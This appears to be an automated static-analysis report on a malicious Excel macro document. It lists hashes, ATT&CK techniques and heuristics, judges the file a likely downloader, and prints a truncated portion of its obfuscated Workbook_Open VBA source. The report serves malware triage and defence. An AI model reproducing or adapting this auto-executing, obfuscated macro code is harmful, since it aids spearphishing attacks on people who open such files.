Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9d22c5ea5e22f92…

MALICIOUS

Office (OLE)

71.5 KB Created: 2018-08-08 23:11:32 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: 1445105b285e05e44c3c4188dbb9d5b8 SHA-1: 497da46b37c01bbe068cfc224becf63a6bba532e SHA-256: a9d22c5ea5e22f928d79089fa28b6e74c5f4d7a12e2471a38749292a595edd75
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, specifically a Workbook_Open macro designed to execute code upon opening. The presence of CreateObject calls and p-code auto-execution indicates an attempt to run arbitrary commands. While the macro code is heavily obfuscated and truncated, its structure strongly suggests it's a downloader or dropper for a secondary payload, typical of macro-based malware delivery.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20484 bytes
SHA-256: db4b6debb0e8bf32402d9c845753fa3f3c56be50978f29d721073453546f459e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
hON2A_nUTHCDjnNvg7_.mYxoySaYQq_WXjWAmwOc
Dim KlGSKvtpTZR_34mLISrtLaHtMnjK2rX3Lcs As Worksheet
If "APccCiuD1WDcd6JzS_eOsbW_fJhwlAYvYJl5pznJaWQUHIENp1_wqL9" = "g3W72_7Zy8QDRSNHbZTwUIA5UDSEu6kDKJDBR" Then
Dim vIc6aV1Ev4ZqkVVYlW1ajxp1o3UL2FNLzinISYqnDOPXnCTNqvhp As Date
End If
Dim JzQ8clOhAmMnnMzArK_LoLVTfPKkgFe_hhA_QoppHHlYAksZLS As Worksheet
If "fdpTA8b6ZKYn_3GGEEKzsBeXDei7R5" = "fuXMi_XMgCfTNdOdGrQ3emMUid9QPdXemennNvSF" Then
Dim r2gHSWvAGiWznYX2fCmDAF6Cn_qrykNUXIJmE_AKq8HqFhzL As Date
End If
Dim EuFKGN_k5dcRpCJfSAZcNuvaAaVC7N6EHclCcC As Worksheet
If "MH_hqkjqdnvlV_FV8S9oJo2BmohWIKZFBPwQXoCJ" = "zR6qOT1z9vdQDx2gOB5ABLgQLniEQx7RPxx1sIuRxqWVqHCLXNAVtBGl" Then
Dim tmdktuhIyJAO__xEPkLSxIjDkUpBwjhMoJF_oIgBHMgeFwL As Date
End If
Dim XZ5_GxwwiCY_W_eUNlvix3sYFDJJjlD6wGQk2dYY1VfANIH7m1R3TLXd As Worksheet
If "qd8DmlL78bKOv4ctKVrZVqI74MfrSJkisv3VfUu" = "NIhCv73IsWgp8d7G_SAHY_dmw1ke9_F" Then
Dim LzjcPwmW9ACwTucm_vn3BeKUHn5N4UWJrOTzVAoSU As Date
End If

Dim AGUQI2SLfsTEDqmMSk2Xbml2DDZmOCESgEcC_zdB5qxnylJlKHpDZ6bW As Worksheet
If "dcL_Zp6bl_h8MjMbEycux8Ba2xZFUA2jlEgfmXkNtTAyD" = "LXk5L7kbphfZuLlNyEkF7TFBqyqMN_b7KVoYyJHDPG6gA" Then
Dim K895NYqE1PiMWOVMp_hNWfLYm7fyyXi_k8dON_MgcOx As Date
End If
Dim GN7ux43OabzbntiPP22PaqikYtF9jzAtFrDIoKq55HFgudydnw7 As Worksheet
If "nk9UZoUUCw4nja_T5oYkDI6UQiAy44kSv3UGGUmcSznF_deEoH3" = "xMK2cnlD1meZGJj1q_7LiB5PMeyUwC5Hu_w_jA1beQvywYe5Ylx_r5" Then
Dim SuQ4n8yPPwrUnFWdPpMcqPOEbx_36I As Date
End If
Dim N5YypAvoV2mMA8FZtWg4UGuNMCeKay86TEhv6xZVqjRTybOP8ACkUAxE As Worksheet
If "IJkldjMf4q34YTd67IKuxYXuwNLYvViRQakt" = "Lx2FUvZGiTzmeFnJxCQsuzyNVxsgFil8rtrGQ_XB9PJaWi3oqXdNI29" Then
Dim V8ltgB2_9r25uWe3smNtdnV1w5Dyr_WwzuUI As Date
End If
Dim nTz9EOKsemFPKdtj4Fdrju6l8CQ3SD__B As Worksheet
If "TMXwOmMamTHwvlMTw3rPlh3WM_C8QXZhFN1OUvncOO7Ywy" = "JYDhfJVsXvTAiNjOIM3ipgu78_MM_VkbiXxl3r1" Then
Dim OKVyD4TLX2_EreLGmmEif6GrBI1ZIY7UZUmWRqpBmvyU_O27VOJ8vGTR As Date
End If
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "hON2A_nUTHCDjnNvg7_"
Dim K8ApU4UxR73_DxT9Q_J7i2NJEsG5XU3GqewpdZM4OEbmkTaNvEp7jJf As String
Dim kFYRmxw1qx9eXj9jdnzpaOLCdT14zl9neFixl4ukdUfDF_87uHF As String
Dim E_4CukOrob3HLhSuFJn7n5aikfX1aXsseMy9__Hrf8pBLa_GKTRWU8PImSaMKXOPsIm9rSuEA5YpNYVIfPoF_TVg6oUph4eGqXRBxAX2iKUZhi4M7Qq5sHJWw_BC7DgFYP9yESTe2vf2969V As String
Dim ASSn3v9sszZVjeDgYNAsKiKQ5BlGzGs5DWThdIBIDKAPTUItzdc_7y_ZFAs1Hz3kEeQLJdCOKzn9h57h21QTms8MQ3ZbZJ_LRXIxC7iTaMwEI_2JDI8Qhg7UgC4 As Integer

 Function Dmw4C3B94moU2xy67C6tFuruP4C4N9hQ(bqbWhLElUinRLFA9e3ni_uBp6vatntvCYGw2UzF_xZib_ksEDPWz6sSpnuZuuU8kwk3DRHlnuntnKhkSCTpWU5FoxFLiYUMba7ocrov5msDP8odEIErYojN1dLOK5BMYYQLM3FkVgusl1yqH)
Dim QOghNblORpZuxBLkO8FeE5MOXXV_sn61X8z1RMnfEb_ As Worksheet
If "i5Bq_Ynkr35VBQHyElemtiUzJTRASiYmyOpcVn_R9SGeBcxA_xZb6" = "aL_iJfnFmQHcQfukobalKmYZzwqeP6dH6pWBo3KGTJUB9As7CYXU9zswwh" Then
Dim rVyGyqv9gkGs5uORP_QWZyCtb1fHI_6jNFJxRLUnN9cGxScl_oireYF As Date
End If
Dim RDo7Ilyangcxja_DnlGZT55HW4CceLDy9PdMgWdkIAcO As Worksheet
If "yoAmoeD2PpgWHeiNiT6ZbnxS6ufPGeP" = "RaoRq2Yx9HKgRrE_AwNBx_BwI1qp39vtuXN6" Then
Dim bK2VHf6QPFejzpdb2bbMX2GzJr5_UZu3cHkx523PHseCTEzKcS2Q5_fj As Date
End If
 Dim n3zbKUyAZ_vIehT4aj4x_iNg9WuoMeybPh_RxGgGZWtc8E2k7GD7rkq_nRcxiIw5NR37gA_RBuWkxth2dHq_a1toz4nenshOjyNoL5D6Ct57M_O4sjRY
Dim CAJYj56zTkFp_pg_iJ_oU_d_2rfBhb7bl_t3pboLwoqs As Worksheet
If "IFvu1rt51N8fEf2W3P1mmDD6mREd21pVuEr" = "ktOptLgtuuVi6wx3Wy_SEBzFglNC9gjt9x" Then
Dim PmmjFYERRIPsIqC8Rfoulh3GGG8duMJkiFfIOvrnMvspz As Date
End If
Dim xag9_NC
... (truncated)